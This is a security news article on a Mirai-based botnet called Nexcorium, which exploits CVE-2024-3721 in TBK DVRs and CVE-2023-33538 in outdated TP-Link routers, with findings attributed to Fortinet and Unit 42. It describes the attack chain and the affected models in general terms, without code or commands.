Cybersecurity researchers have uncovered a new wave of attacks where threat actors are exploiting vulnerabilities in TBK digital video recorders and outdated TP-Link routers to deploy a powerful Mirai-based botnet. The findings were reported by Fortinet FortiGuard Labs and Palo Alto Networks Unit 42.
Exploitation of TBK DVR Devices
The attack specifically targets TBK DVR systems by abusing CVE-2024-3721, a medium-severity flaw affecting models DVR-4104 and DVR-4216. This vulnerability allows attackers to inject malicious commands remotely and install a Mirai-based malware variant known as Nexcorium.
Security expert Vincent Li explained that IoT devices have become prime targets due to weak security practices, lack of updates, and widespread deployment. Attackers continue to rely on known vulnerabilities to gain initial access and spread malware capable of launching large-scale distributed denial-of-service attacks.
Growing Use of Mirai-Based Botnets
This is not the first time this vulnerability has been exploited. Over the past year, attackers have used it to spread multiple botnets, including Mirai variants and a newer threat known as RondoDox. Additionally, researchers have linked similar campaigns to loader-as-a-service operations that distribute various malware families across IoT devices and enterprise systems.
How the Nexcorium Attack Works
The attack chain begins with exploitation of the DVR vulnerability, allowing attackers to deploy a downloader script. This script identifies the system architecture and installs the appropriate malware payload.
Once active, the malware displays a message indicating control has been taken. It shares structural similarities with Mirai, including encoded configuration tables, monitoring components, and DDoS attack modules.
Advanced Capabilities and Persistence
Nexcorium is equipped with additional exploitation capabilities, including targeting CVE-2017-17215, which affects Huawei HG532 devices. The malware also uses built-in credential lists to perform brute-force attacks via Telnet.
If access is gained, the malware:
- Obtains a system shell
- Establishes persistence using system services
- Connects to command-and-control servers
- Launches DDoS attacks using UDP, TCP, and SMTP protocols
To avoid detection, it removes traces of its installation after successfully infecting the system.
Threat to End-of-Life TP-Link Routers
Researchers from Unit 42 also identified active attempts to exploit CVE-2023-33538, a high-severity flaw affecting unsupported TP-Link routers. Although current attack attempts appear flawed, the vulnerability itself remains valid and dangerous.
This flaw has been officially listed in the Known Exploited Vulnerabilities catalog by Cybersecurity and Infrastructure Security Agency, highlighting its real-world risk.
Affected models include:
- TL-WR940N (v2, v4)
- TL-WR740N (v1, v2)
- TL-WR841N (v8, v10)
Attackers are attempting to deploy Mirai-like malware variants that can self-update and spread across networks by acting as web servers.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
